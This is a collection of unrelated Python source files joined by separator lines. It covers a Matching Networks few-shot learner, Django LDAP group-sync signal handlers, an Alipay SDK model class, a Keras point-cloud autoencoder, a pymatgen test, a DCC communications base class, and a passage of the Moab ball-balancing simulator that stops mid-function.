combos = pd.DataFrame.from_records(combos, columns=['file_path', 'html_dir_path', 'parsed_dir_path'])
combos['parse_result'] = apply_parallel(combos, partial(execute_parallel, max_num_missing_items = 0, marked_html = True), npartitions=6)
combos.to_csv(results_file_path, index=False)
main()
|
"""
See original implementation at
https://github.com/facebookresearch/low-shot-shrink-hallucinate
"""
import torch
from torch import nn
from easyfsl.methods import AbstractMetaLearner
class MatchingNetworks(AbstractMetaLearner):
"""
Oriol Vinyals, Charles Blundell, Timothy Lillicrap, Koray Kavukcuoglu, and Daan Wierstra.
"Matching networks for one shot learning." (2016)
https://arxiv.org/pdf/1606.04080.pdf
Matching networks extract feature vectors for both support and query images. Then they refine
these feature by using the context of the whole support set, using LSTMs. Finally they compute
query labels using their cosine similarity to support images.
"""
def __init__(self, *args):
"""
Build Matching Networks by calling the constructor of AbstractMetaLearner.
Raises:
ValueError: if the backbone is not a feature extractor,
i.e. if its output for a given image is not a 1-dim tensor.
"""
super().__init__(*args)
if len(self.backbone_output_shape) != 1:
raise ValueError(
"Illegal backbone for Matching Networks. "
"Expected output for an image is a 1-dim tensor."
)
# The model outputs log-probabilities, so we use the negative log-likelihood loss
self.loss_function = nn.NLLLoss()
# These modules refine support and query feature vectors
# using information from the whole support set
self.support_features_encoder = nn.LSTM(
input_size=self.feature_dimension,
hidden_size=self.feature_dimension,
num_layers=1,
batch_first=True,
bidirectional=True,
)
self.query_features_encoding_cell = nn.LSTMCell(
self.feature_dimension * 2, self.feature_dimension
)
self.softmax = nn.Softmax(dim=1)
# Here we create the fields so that the model can store
# the computed information from one support set
self.contextualized_support_features = None
self.one_hot_support_labels = None
def process_support_set(
self,
support_images: torch.Tensor,
support_labels: torch.Tensor,
):
"""
Overrides process_support_set of AbstractMetaLearner.
Extract features from the support set with full context embedding.
Store contextualized feature vectors, as well as support labels in the one hot format.
Args:
support_images: images of the support set
support_labels: labels of support set images
"""
support_features = self.backbone(support_images)
self.contextualized_support_features = self.encode_support_features(
support_features
)
self.one_hot_support_labels = nn.functional.one_hot(support_labels).float()
def forward(self, query_images: torch.Tensor) -> torch.Tensor:
"""
Overrides method forward in AbstractMetaLearner.
Predict query labels based on their cosine similarity to support set features.
Classification scores are log-probabilities.
Args:
query_images: images of the query set
Returns:
a prediction of classification scores for query images
"""
# Refine query features using the context of the whole support set
contextualized_query_features = self.encode_query_features(
self.backbone(query_images)
)
# Compute the matrix of cosine similarities between all query images
# and normalized support images
# Following the original implementation, we don't normalize query features to keep
# "sharp" vectors after softmax (if normalized, all values tend to be the same)
similarity_matrix = self.softmax(
contextualized_query_features.mm(
nn.functional.normalize(self.contextualized_support_features).T
)
)
# Compute query log probabilities based on cosine similarity to support instances
# and support labels
log_probabilities = (
similarity_matrix.mm(self.one_hot_support_labels) + 1e-6
).log()
return log_probabilities
def encode_support_features(
self,
support_features: torch.Tensor,
) -> torch.Tensor:
"""
Refine support set features by putting them in the context of the whole support set,
using a bidirectional LSTM.
Args:
support_features: output of the backbone
Returns:
contextualised support features, with the same shape as input features
"""
# Since the LSTM is bidirectional, hidden_state is of the shape
# [number_of_support_images, 2 * feature_dimension]
hidden_state = self.support_features_encoder(support_features.unsqueeze(0))[
0
].squeeze(0)
# Following the paper, contextualized features are computed by adding original features, and
# hidden state of both directions of the bidirectional LSTM.
contextualized_support_features = (
support_features
+ hidden_state[:, : self.feature_dimension]
+ hidden_state[:, self.feature_dimension :]
)
return contextualized_support_features
def encode_query_features(self, query_features: torch.Tensor) -> torch.Tensor:
"""
Refine query set features by putting them in the context of the whole support set,
using attention over support set features.
Args:
query_features: output of the backbone
Returns:
contextualized query features, with the same shape as input features
"""
hidden_state = query_features
cell_state = torch.zeros_like(query_features)
# We do as many iterations through the LSTM cell as there are query instances
# Check out the paper for more details about this!
for _ in range(len(self.contextualized_support_features)):
attention = self.softmax(
hidden_state.mm(self.contextualized_support_features.T)
)
read_out = attention.mm(self.contextualized_support_features)
lstm_input = torch.cat((query_features, read_out), 1)
hidden_state, cell_state = self.query_features_encoding_cell(
lstm_input, (hidden_state, cell_state)
)
hidden_state = hidden_state + query_features
return hidden_state
|
from django.apps import AppConfig
class WardConfig(AppConfig):
name = 'ward'
|
import imageio
import tqdm
import numpy
import scipy
import matplotlib
import keras
import tensorflow
print("imageio=={}".format(imageio.__version__))
print("tqdm=={}".format(tqdm.__version__))
print("numpy=={}".format(numpy.__version__))
print("scipy=={}".format(scipy.__version__))
print("matplotlib=={}".format(matplotlib.__version__))
print("keras=={}".format(keras.__version__))
print("tensorflow=={}".format(tensorflow.__version__))
|
from coco.contract.backends import GroupBackend
from coco.contract.errors import GroupBackendError, GroupNotFoundError
from coco.core.helpers import get_internal_ldap_connected
from coco.core.models import BackendGroup
from coco.core.signals.signals import backend_group_created, \
backend_group_deleted, backend_group_member_added, \
backend_group_member_removed, backend_group_modified
from django.dispatch import receiver
from django.db.models.signals import post_delete, post_save
@receiver(backend_group_member_added)
def add_member_to_internal_ldap_group(sender, group, user, **kwargs):
"""
Whenever a member is added to a group we need to sync the LDAP group.
"""
if group is not None and user is not None:
try:
internal_ldap = get_internal_ldap_connected()
internal_ldap.add_group_member(group.backend_pk, user.backend_pk)
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(backend_group_member_removed)
def remove_member_from_internal_ldap_group(sender, group, user, **kwargs):
"""
Whenever a member is removed from a group we need to sync the LDAP group.
"""
if group is not None and user is not None:
try:
internal_ldap = get_internal_ldap_connected()
internal_ldap.remove_group_member(group.backend_pk, user.backend_pk)
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(backend_group_created)
def create_on_internal_ldap(sender, group, **kwargs):
"""
BackendGroup instances are used to represent external backends (e.g. LDAP) groups.
If such a group is created, we should therefor create the group on the backend.
"""
if group is not None:
try:
internal_ldap = get_internal_ldap_connected()
created = internal_ldap.create_group(group.backend_id, group.backend_pk)
# FIXME: this is the first time we really know the ID/PK given by the backend.
# all other operations having used to old ones might not be valid anymore...
group.backend_id = created.get(GroupBackend.FIELD_ID)
group.backend_pk = created.get(GroupBackend.FIELD_PK)
group.save()
except GroupBackendError as ex:
group.delete() # XXX: cleanup?
raise ex
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(backend_group_deleted)
def delete_django_group(sender, group, **kwargs):
"""
Delete the internal Django group on delete.
"""
if group is not None:
try:
group.django_group.delete()
except:
pass # already deleted?
@receiver(backend_group_deleted)
def delete_on_internal_ldap(sender, group, **kwargs):
"""
In case the BackendGroup record is deleted, we need to cleanup the internal LDAP server.
"""
if group is not None:
try:
internal_ldap = get_internal_ldap_connected()
internal_ldap.delete_group(group.backend_pk)
except GroupNotFoundError:
pass # already deleted
except GroupBackendError as ex:
# XXX: recreate?
raise ex
finally:
try:
internal_ldap.disconnect()
except:
pass
@receiver(post_delete, sender=BackendGroup)
def post_delete_handler(sender, instance, **kwargs):
"""
Method to map Django post_delete model signals to custom ones.
"""
backend_group_deleted.send(sender=sender, group=instance, kwargs=kwargs)
@receiver(post_save, sender=BackendGroup)
def post_save_handler(sender, instance, **kwargs):
"""
Method to map Django post_save model signals to custom ones.
"""
if 'created' in kwargs and kwargs.get('created'):
backend_group_created.send(sender=sender, group=instance, kwargs=kwargs)
else:
backend_group_modified.send(
sender=sender,
group=instance,
fields=kwargs.get('update_fields'),
kwargs=kwargs
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AccessProduceQrcode(object):
def __init__(self):
self._batch_id = None
self._core_url = None
self._produce_order_id = None
self._qrcode = None
@property
def batch_id(self):
return self._batch_id
@batch_id.setter
def batch_id(self, value):
self._batch_id = value
@property
def core_url(self):
return self._core_url
@core_url.setter
def core_url(self, value):
self._core_url = value
@property
def produce_order_id(self):
return self._produce_order_id
@produce_order_id.setter
def produce_order_id(self, value):
self._produce_order_id = value
@property
def qrcode(self):
return self._qrcode
@qrcode.setter
def qrcode(self, value):
self._qrcode = value
def to_alipay_dict(self):
params = dict()
if self.batch_id:
if hasattr(self.batch_id, 'to_alipay_dict'):
params['batch_id'] = self.batch_id.to_alipay_dict()
else:
params['batch_id'] = self.batch_id
if self.core_url:
if hasattr(self.core_url, 'to_alipay_dict'):
params['core_url'] = self.core_url.to_alipay_dict()
else:
params['core_url'] = self.core_url
if self.produce_order_id:
if hasattr(self.produce_order_id, 'to_alipay_dict'):
params['produce_order_id'] = self.produce_order_id.to_alipay_dict()
else:
params['produce_order_id'] = self.produce_order_id
if self.qrcode:
if hasattr(self.qrcode, 'to_alipay_dict'):
params['qrcode'] = self.qrcode.to_alipay_dict()
else:
params['qrcode'] = self.qrcode
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AccessProduceQrcode()
if 'batch_id' in d:
o.batch_id = d['batch_id']
if 'core_url' in d:
o.core_url = d['core_url']
if 'produce_order_id' in d:
o.produce_order_id = d['produce_order_id']
if 'qrcode' in d:
o.qrcode = d['qrcode']
return o
|
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 25 10:01:16 2020
@author: eliphat
Copyright 2020 Shanghai Jiao Tong University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import random
import numpy
import tensorflow as tf
import keras.backend as K
import keras
import data_flower
import visualizations
DATASET = r"./point_cloud/train"
TESTSET = r"./point_cloud/test"
def cut_points(args, k=100): # Hard cut, BP will fail
points, probab = args
argsorted = tf.argsort(probab, direction='DESCENDING')
indices = tf.gather(argsorted, tf.range(k), axis=-1)
return [tf.gather(points, indices, axis=-2, batch_dims=1),
tf.gather(probab, indices, axis=-1, batch_dims=1)]
def cut_points_layer(k=100):
return keras.layers.Lambda(lambda x: cut_points(x, k))
def dense_block(x, size):
y = keras.layers.Dense(size)(x)
y_bn = keras.layers.BatchNormalization()(y)
y_a = keras.layers.ReLU()(y_bn)
return y_a
def mlp_block(x, *sizes):
for size in sizes:
x = dense_block(x, size)
return x
def repeat_global(args):
glo, target = args
return keras.layers.RepeatVector(K.shape(target)[-2])(glo)
def merge_global(args):
glo, loc = args
repeated = repeat_global([glo, loc])
merged = K.concatenate([loc, repeated])
return merged
def probab_merge(args):
points, prob = args
# points: k x 3
# prob: 32 x k
# out: 32 x 3
prob = K.expand_dims(prob) # 32 x k x 1
points = K.expand_dims(points, axis=-3) # 1 x k x 3
merge = prob * points # broadcast, 32 x k x 3
return K.sum(merge, axis=-2)
def vec_norm(x):
return K.sqrt(K.sum(K.square(x), axis=-1) + K.epsilon())
def encoder(n_out=32, point_dims=3):
x = keras.layers.Input([None, point_dims])
y1 = mlp_block(x, 64, 64)
y2 = mlp_block(y1, 64, 128, 1024)
y_p = keras.layers.GlobalMaxPool1D()(y2)
merged = keras.layers.Lambda(merge_global)([y_p, y1])
yf = mlp_block(merged, 512, 256, n_out) # k x 32
yf_p = keras.layers.Permute([2, 1])(yf) # 32 x k
yf_pa = keras.layers.Softmax()(yf_p)
# to merge with k x 3
yf_pts = keras.layers.Lambda(probab_merge)([x, yf_pa])
return keras.models.Model(inputs=x, outputs=[yf_pts, yf_pa])
def decoder(k=32, point_dims=3):
def _call(x):
y1 = mlp_block(x, 64, 64)
yc2 = mlp_block(y1, 64, 128, 1024)
yc_p = keras.layers.GlobalMaxPool1D()(yc2)
yc = mlp_block(yc_p, 512, 256, 40)
yc_a = keras.layers.Softmax(name='aux')(yc)
y1_r = keras.layers.Flatten()(y1)
y2 = mlp_block(y1_r, 256, 512)
yf = keras.layers.Dense(1024 * point_dims)(y2)
yf_r = keras.layers.Reshape([1024, point_dims], name='recon')(yf)
return yf_r, yc_a
return _call
def nearest_neighbour_loss(y_true, y_pred):
# y_true: k1 x 3
# y_pred: k2 x 3
y_true_rep = K.expand_dims(y_true, axis=-2) # k1 x 1 x 3
y_pred_rep = K.expand_dims(y_pred, axis=-3) # 1 x k2 x 3
# k1 x k2 x 3
y_delta = K.sum(K.square(y_pred_rep - y_true_rep), axis=-1)
# k1 x k2
y_nearest = K.min(y_delta, -2)
# k2
b_nearest = K.min(y_delta, -1)
# k1
return K.mean(y_nearest) + K.mean(b_nearest)
def deviation_regularization(y_true, y_pred):
std = K.std(y_pred, axis=-2)
return K.mean(std)
def loss_fn(y_true, y_pred):
return nearest_neighbour_loss(y_true, y_pred)
def network(point_dims=3, return_enc=False):
x = keras.layers.Input([None, point_dims])
enc = encoder(8, point_dims)
y_enc, pa = enc(x)
dec = decoder(8, point_dims)
y_dec, y_lab = dec(y_enc)
if return_enc:
return enc, keras.models.Model(inputs=x, outputs=[y_dec, y_lab])
return keras.models.Model(inputs=x, outputs=[y_dec, y_lab])
def nor(a):
data = a
nmean = numpy.mean(data, axis=-2, keepdims=True)
nstd = numpy.std(data, axis=-2, keepdims=True)
nstd = numpy.mean(nstd, axis=-1, keepdims=True)
return (data - nmean) / nstd
def visual_test(reload=False):
global x_test, enc, model
if reload:
x_test, x_label = data_flower.all_h5(TESTSET, True, True)
x_test = x_test[numpy.equal(x_label, 0)[:, 0], :, :]
enc, model = network(return_enc=True)
model.load_weights("weights_acae.h5")
pick = random.choice(x_test)
pd = model.predict(numpy.array([pick]))[0][0]
global Mx
Mx = enc.predict(numpy.array([pick]))[1][0]
MpSort = numpy.argsort(Mx, axis=-1)
Mp = numpy.reshape(MpSort[:, -2:], [-1])
kp = enc.predict(numpy.array([pick]))[0][0]
visualizations.merge_pcd(pick[list(filter(lambda x: x not in Mp, range(2048)))], pick[Mp])
# visualizations.show_point_cloud_array(pick)
visualizations.show_point_cloud_array(pd)
# visualizations.show_point_cloud_array(kp)
def repeatability_test():
x_test = data_flower.all_h5(TESTSET, True)
enc, model = network(return_enc=True)
model.load_weights("weights_acae.h5")
kp, _ = enc.predict(x_test, verbose=1)
rand = numpy.random.normal(size=[3, 1])
rand_T = numpy.transpose(rand)
gemm = numpy.matmul
ortho = numpy.eye(3) - 2 * (gemm(rand, rand_T)) / (gemm(rand_T, rand))
x_test_r = numpy.dot(x_test, ortho)
kp_r, _ = enc.predict(x_test_r, verbose=1)
kp_r = numpy.expand_dims(kp_r, axis=-2) # k1 x 1 x 3
kp = numpy.expand_dims(kp, axis=-3) # 1 x k2 x 3
delta = numpy.sum(numpy.square(kp - kp_r), axis=-1)
nearest = numpy.min(delta, -2)
eq = numpy.less_equal(nearest, 0.05 ** 2)
print("Repeatability:", numpy.mean(eq))
def train():
x, xl = data_flower.all_h5(DATASET, True, True) # n x 2048 x 3
x_test, xl_test = data_flower.all_h5(TESTSET, True, True)
model = network()
model.compile(
optimizer=keras.optimizers.Adam(),
loss={"recon": loss_fn, "aux": "sparse_categorical_crossentropy"},
loss_weights={"recon": 0.85, "aux": 0.15},
metrics={"recon": deviation_regularization, "aux": "acc"}
)
clbk = [
keras.callbacks.CSVLogger("training_acae.csv"),
keras.callbacks.ModelCheckpoint("weights_acae.h5",
save_best_only=True,
save_weights_only=True)
]
model.fit(x=x, y=[x, xl], batch_size=64, epochs=50,
validation_data=(x_test, [x_test, xl_test]),
callbacks=clbk)
# visual_test(True)
|
# coding: utf-8
# Copyright (c) 2018-2019, Taku MURAKAMI. All rights reserved.
# Distributed under the terms of the BSD 3-clause License.
import logging
import pymatgen
from pymatgen.io.vasp.inputs import Poscar
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from model.modelgenerator import ModelGenerator
"""
The test for modify_symmetrical() method.
"""
logger = logging.getLogger(__name__)
if __name__ == "__main__":
gen = ModelGenerator("inputs/cif/Al2O3_hR30_R-3c_167.cif", fmt="cif")
for i in range(10):
while True:
gen.modify_symmetrical(min=-0.05, max=0.05)
constrains = gen.check_constrains(alpha_min=89.9, alpha_max=90.1,
beta_min=89.9, beta_max=90.1,
gamma_min=119.9, gamma_max=120.1)
if constrains is True:
break
with open("outputs/symmetrical/POSCAR"+str(i).zfill(2), mode="w") as file:
file.writelines(str(Poscar(gen.get_struct())))
gen.reset_struct()
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------#
# Copyright © 2015-2016 VMware, Inc. All Rights Reserved. #
# #
# Licensed under the BSD 2-Clause License (the “License”); you may not use #
# this file except in compliance with the License. #
# #
# The BSD 2-Clause License #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are met:#
# #
# - Redistributions of source code must retain the above copyright notice, #
# this list of conditions and the following disclaimer. #
# #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in the #
# documentation and/or other materials provided with the distribution. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"#
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE #
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE #
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE #
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR #
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF #
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN #
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) #
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF #
# THE POSSIBILITY OF SUCH DAMAGE. #
# ----------------------------------------------------------------------------#
from abc import ABCMeta, abstractmethod
class DCCComms:
"""
Abstract base class for all DCC communications.
"""
__metaclass__ = ABCMeta
# -----------------------------------------------------------------------
# If a specific DCCComms has parameters to establish connection, pass
# them to its constructor, not self._connect. Keep self._connect free of
# external arguments.
#
@abstractmethod
def __init__(self):
"""
Abstract init method for DCCComms (Data Center Component Communication Protocols).
This must take all necessary params to establish a connection and must call _connect().
"""
self._connect()
@abstractmethod
def _connect(self):
"""
Abstract method for protocol specific connection establishment implementation.
All sub-classes implementing this method MUST assign the established connection to the variable 'self.client'
(Eg:) self.client = MyProtocol(ip, port, credentials)
:return:
"""
pass
@abstractmethod
def _disconnect(self):
"""
Abstract method for protocol-specific disconnect implementation.
:return:
"""
pass
@abstractmethod
def send(self, message, msg_attr):
"""
Abstract method to send message over the established connection.
:param message: Message to be sent
:param msg_attr: MessagingAttributes object. Message oriented protocols require params like QoS, RoutingKey,
Topics, etc., Such parameters should be encapsulated into protocol specific objects.
Eg: MqttMessagingAttributes, AmqpMessagingAttributes
:return:
"""
pass
@abstractmethod
def receive(self, msg_attr):
"""
Abstract method to receive message from the DCC.
:param msg_attr: MessagingAttributes object. Message oriented protocols require params like QoS, RoutingKey,
Topics, Callbacks, etc., Such parameters should be encapsulated into protocol specific objects.
Eg: MqttMessagingAttributes, AmqpMessagingAttributes
:return:
"""
pass
|
"""
Simulator for the Moab plate+ball balancing device.
"""
__author__ = "Mike Estee"
__copyright__ = "Copyright 2020, Microsoft Corp."
# pyright: strict
import math
import random
from typing import Dict, Tuple, cast
import numpy as np
from pyrr import Quaternion, Vector3, matrix44, quaternion, ray, vector
from pyrr.geometric_tests import ray_intersect_plane
from pyrr.plane import create_from_position
# Some type aliases for clarity
Plane = np.ndarray
Ray = np.ndarray
DEFAULT_TIME_DELTA = 0.045 # s, 45ms
DEFAULT_GRAVITY = 9.81 # m/s^2, Earth: there's no place like it.
DEFAULT_BALL_RADIUS = 0.02 # m, Ping-Pong ball: 20mm
DEFAULT_BALL_SHELL = 0.0002 # m, Ping-Pong ball: 0.2mm
DEFAULT_BALL_MASS = 0.0027 # kg, Ping-Pong ball: 2.7g
DEFAULT_OBSTACLE_RADIUS = 0.0 # m, if radius is zero, obstacle is disabled
DEFAULT_OBSTACLE_X = 0.03 # m, arbitrarily chosen
DEFAULT_OBSTACLE_Y = 0.03 # m, arbitrarily chosen
DEFAULT_PLATE_RADIUS = 0.225 / 2.0 # m, Moab: 225mm dia
PLATE_ORIGIN_TO_SURFACE_OFFSET = (
0.009 # 9mm offset from plate rot origin to plate surface
)
# plate limits
PLATE_HEIGHT_MAX = 0.040 # m, Moab: 40mm
DEFAULT_PLATE_HEIGHT = PLATE_HEIGHT_MAX / 2.0
DEFAULT_PLATE_ANGLE_LIMIT = math.radians(44.0 * 0.5) # rad, 1/2 full range
DEFAULT_PLATE_Z_LIMIT = PLATE_HEIGHT_MAX / 2.0 # m, +/- limit from center Z pos
# default ball Z position
DEFAULT_BALL_Z_POSITION = (
DEFAULT_PLATE_HEIGHT + PLATE_ORIGIN_TO_SURFACE_OFFSET + DEFAULT_BALL_RADIUS
)
PLATE_MAX_Z_VELOCITY = 1.0 # m/s
PLATE_Z_ACCEL = 10.0 # m/s^2
# Moab measured velocity at 15deg in 3/60ths, or 300deg/s
DEFAULT_PLATE_MAX_ANGULAR_VELOCITY = (60.0 / 3.0) * math.radians(15) # rad/s
# Set acceleration to get the plate up to velocity in 1/100th of a sec
DEFAULT_PLATE_ANGULAR_ACCEL = (
100.0 / 1.0
) * DEFAULT_PLATE_MAX_ANGULAR_VELOCITY # rad/s^2
# useful constants
X_AXIS = np.array([1.0, 0.0, 0.0])
Y_AXIS = np.array([0.0, 1.0, 0.0])
Z_AXIS = np.array([0.0, 0.0, 1.0])
# Sensor Actuator Noises
DEFAULT_PLATE_NOISE = 0.0 # noise added to plate_theta_* (rad)
DEFAULT_BALL_NOISE = 0.0 # noise added to estimated_* ball location (m)
DEFAULT_JITTER = 0.0 # jitter added to step_time (s)
def clamp(val: float, min_val: float, max_val: float):
return min(max_val, max(min_val, val))
class MoabModel:
def __init__(self):
self.reset()
def reset(self):
"""
Resets the model to known default state.
If further changes are applied after reseting, the caller should call:
model.update_plate(True)
model.update_ball(True)
"""
# general config
self.time_delta = DEFAULT_TIME_DELTA
self.jitter = DEFAULT_JITTER
self.step_time = self.time_delta
self.elapsed_time = 0.0
self.gravity = DEFAULT_GRAVITY
# plate config
self.plate_noise = DEFAULT_PLATE_NOISE
self.plate_radius = DEFAULT_PLATE_RADIUS
self.plate_theta_limit = DEFAULT_PLATE_ANGLE_LIMIT
self.plate_theta_vel_limit = DEFAULT_PLATE_MAX_ANGULAR_VELOCITY
self.plate_theta_acc = DEFAULT_PLATE_ANGULAR_ACCEL
self.plate_z_limit = DEFAULT_PLATE_Z_LIMIT
# ball config
self.ball_noise = DEFAULT_BALL_NOISE
self.ball_mass = DEFAULT_BALL_MASS
self.ball_radius = DEFAULT_BALL_RADIUS
self.ball_shell = DEFAULT_BALL_SHELL
# control input (unitless) [-1..1]
self.pitch = 0.0
self.roll = 0.0
self.height_z = 0.0
# plate state
self.plate_theta_x = 0.0
self.plate_theta_y = 0.0
self.plate = Vector3([0.0, 0.0, DEFAULT_PLATE_HEIGHT])
self.plate_theta_vel_x = 0.0
self.plate_theta_vel_y = 0.0
self.plate_vel_z = 0.0
# ball state
self.ball = Vector3([0.0, 0.0, DEFAULT_BALL_Z_POSITION])
self.ball_vel = Vector3([0.0, 0.0, 0.0])
self.ball_qat = Quaternion([0.0, 0.0, 0.0, 1.0])
self.ball_on_plate = Vector3(
[0.0, 0.0, PLATE_ORIGIN_TO_SURFACE_OFFSET + DEFAULT_BALL_RADIUS]
)
# current target
self.target_x = 0.0
self.target_y = 0.0
# current obstacle
self.obstacle_distance = 0.0
self.obstacle_direction = 0.0
self.obstacle_radius = 0.0
self.obstacle_x = 0.0
self.obstacle_y = 0.0
# camera observed estimated metrics
self.estimated_x = 0.0
self.estimated_y = 0.0
self.estimated_vel_x = 0.0
self.estimated_vel_y = 0.0
self.estimated_radius = self.ball_radius
# target relative polar coords/vel
self.estimated_speed = 0.0
self.estimated_direction = 0.0
self.estimated_distance = 0.0
self.prev_estimated_x = 0.0
self.prev_estimated_y = 0.0
# meta
self.iteration_count = 0
# now that the base state has been set, run an update
# to make sure the all variables are internally constistent
self.update_plate(True)
self.update_ball(True)
def halted(self) -> bool:
"""
Returns True if the ball is off the plate.
"""
# ball.z relative to plate
zpos = self.ball.z - (
self.plate.z + self.ball_radius + PLATE_ORIGIN_TO_SURFACE_OFFSET
)
# ball distance from ball position on plate at origin
distance_to_center = math.sqrt(
math.pow(self.ball.x, 2.0)
+ math.pow(self.ball.y, 2.0)
+ math.pow(zpos, 2.0)
)
return distance_to_center > self.plate_radius
def step(self):
"""
Single step the simulation.
The current actions will be applied, and the model evaluated.
All state variables will be updated.
"""
self.step_time = self.time_delta + MoabModel.random_noise(self.jitter)
self.elapsed_time += self.step_time
self.update_plate(False)
self.update_ball(False)
# update meta
self.iteration_count += 1
# returns a noise value in the range [-scalar .. scalar] with a gaussian distribution
@staticmethod
def random_noise(scalar: float) -> float:
return scalar * clamp(
random.gauss(mu=0, sigma=0.333), -1, 1
) # mean zero gauss with sigma = ~sqrt(scalar)/3
@staticmethod
def accel_param(
q: float, dest: float, vel: float, acc: float, max_vel: float, delta_t: float
) -> Tuple[float, float]:
"""
perform a linear acceleration of variable towards a destination
with a hard stop at the destination. returns the position and velocity
after delta_t has elapsed.
q: initial position
dest: target destination
vel: current velocity
acc: acceleration constant
max_vel: maximum velocity
delta_t: time delta
returns: (final_position, final_velocity)
"""
# direction of accel
dir = 0.0
if q < dest:
dir = 1.0
if q > dest:
dir = -1.0
# calculate the change in velocity and position
acc = acc * dir * delta_t
vel_end = clamp(vel + acc * delta_t, -max_vel, max_vel)
vel_avg = (vel + vel_end) * 0.5
delta = vel_avg * delta_t
vel = vel_end
# moving towards the dest?
if (dir > 0 and q < dest and q + delta < dest) or (
dir < 0 and q > dest and q + delta > dest
):
q = q + delta
# stop at dest
else:
q = dest
vel = 0
return (q, vel)
@staticmethod
def heading_to_point(
start_x: float,
start_y: float,
vel_x: float,
vel_y: float,
point_x: float,
point_y: float,
):
"""
Return a heading, in 2D RH coordinate system.
x,y: the current position of the object
vel_x, vel_y: the current velocity vector of motion for the object
point_x, point_y: the destination point to head towards
returns: offset angle in radians in the range [-pi .. pi]
where:
0.0: object is moving directly towards the point
[-pi .. <0]: object is moving to the "right" of the point
[>0 .. -pi]: object is moving to the "left" of the point
[-pi, pi]: object is moving directly away from the point
"""
# vector to point
dx = point_x - start_x
dy = point_y - start_y
# if the ball is already at the target location or
# is not moving, return a heading of 0 so we don't
# attempt to normalize a zero-length vector
if dx == 0 and dy == 0:
return 0
if vel_x == 0 and vel_y == 0:
return 0
# vectors and lengths
u = vector.normalize([dx, dy, 0.0])
v = vector.normalize([vel_x, vel_y, 0.0])
ul = vector.length(u)
vl = vector.length(v)
# no velocity? already on the target?
angle = 0.0
if (ul != 0.0) and (vl != 0.0):
# angle between vectors
uv_dot = vector.dot(u, v)
# signed angle
x = u[0]
y = u[1]
angle = math.atan2(vector.dot([-y, x, 0.0], v), uv_dot)
if math.isnan(angle):
angle = 0.0
return angle
@staticmethod
def distance_to_point(x: float, y: float, point_x: float, point_y: float) -> float:
"""
Return the distance between two 2D points.
"""
dx = point_x - x
dy = point_y - y
return math.sqrt((dx ** 2.0) + (dy ** 2.0))
# convert X/Y theta components into a Z-Up RH plane normal
def _plate_nor(self) -> Vector3:
x_rot = matrix44.create_from_axis_rotation(
axis=X_AXIS, theta=self.plate_theta_x
)
y_rot = matrix44.create_from_axis_rotation(
axis=Y_AXIS, theta=self.plate_theta_y
)
# pitch then roll
nor = matrix44.apply_to_vector(mat=x_rot, vec=Z_AXIS)
nor = matrix44.apply_to_vector(mat=y_rot, vec=nor)
nor = vector.normalize(nor)
return Vector3(nor)
def update_plate(self, plate_reset: bool = False):
# Find the target xth,yth & zpos
# convert xy[-1..1] to zx[-self.plate_theta_limit .. self.plate_theta_limit]
# convert z[-1..1] to [PLATE_HEIGHT_MAX/2 - self.plate_z_limit .. PLATE_HEIGHT_MAX/2 + self.plate_z_limit]
theta_x_target = self.plate_theta_limit * self.pitch # pitch around X axis
theta_y_target = self.plate_theta_limit * self.roll # roll around Y axis
z_target = (self.height_z * self.plate_z_limit) + PLATE_HEIGHT_MAX / 2.0
# quantize target positions to whole degree increments
# the Moab hardware can only command by whole degrees
theta_y_target = math.radians(round(math.degrees(theta_y_target)))
theta_x_target = math.radians(round(math.degrees(theta_x_target)))
# get the current xth,yth & zpos
theta_x, theta_y = self.plate_theta_x, self.plate_theta_y
z_pos = self.plate.z
# on reset, bypass the motion equations
if plate_reset:
theta_x = theta_x_target
theta_y = theta_y_target
z_pos = z_target
# smooth transition to target based on accel and velocity limits
else:
theta_x, self.plate_theta_vel_x = MoabModel.accel_param(
theta_x,
theta_x_target,
self.plate_theta_vel_x,
self.plate_theta_acc,
self.plate_theta_vel_limit,
self.step_time,
)
theta_y, self.plate_theta_vel_y = MoabModel.accel_param(
theta_y,
theta_y_target,
self.plate_theta_vel_y,
self.plate_theta_acc,
self.plate_theta_vel_limit,
self.step_time,
)
z_pos, self.plate_vel_z = MoabModel.accel_param(
z_pos,
z_target,
self.plate_vel_z,
PLATE_Z_ACCEL,
PLATE_MAX_Z_VELOCITY,
self.step_time,
)
# add noise to the plate positions
theta_x += MoabModel.random_noise(self.plate_noise)
theta_y += MoabModel.random_noise(self.plate_noise)
# clamp to range limits
theta_x = clamp(theta_x, -self.plate_theta_limit, self.plate_theta_limit)
theta_y = clamp(theta_y, -self.plate_theta_limit, self.plate_theta_limit)
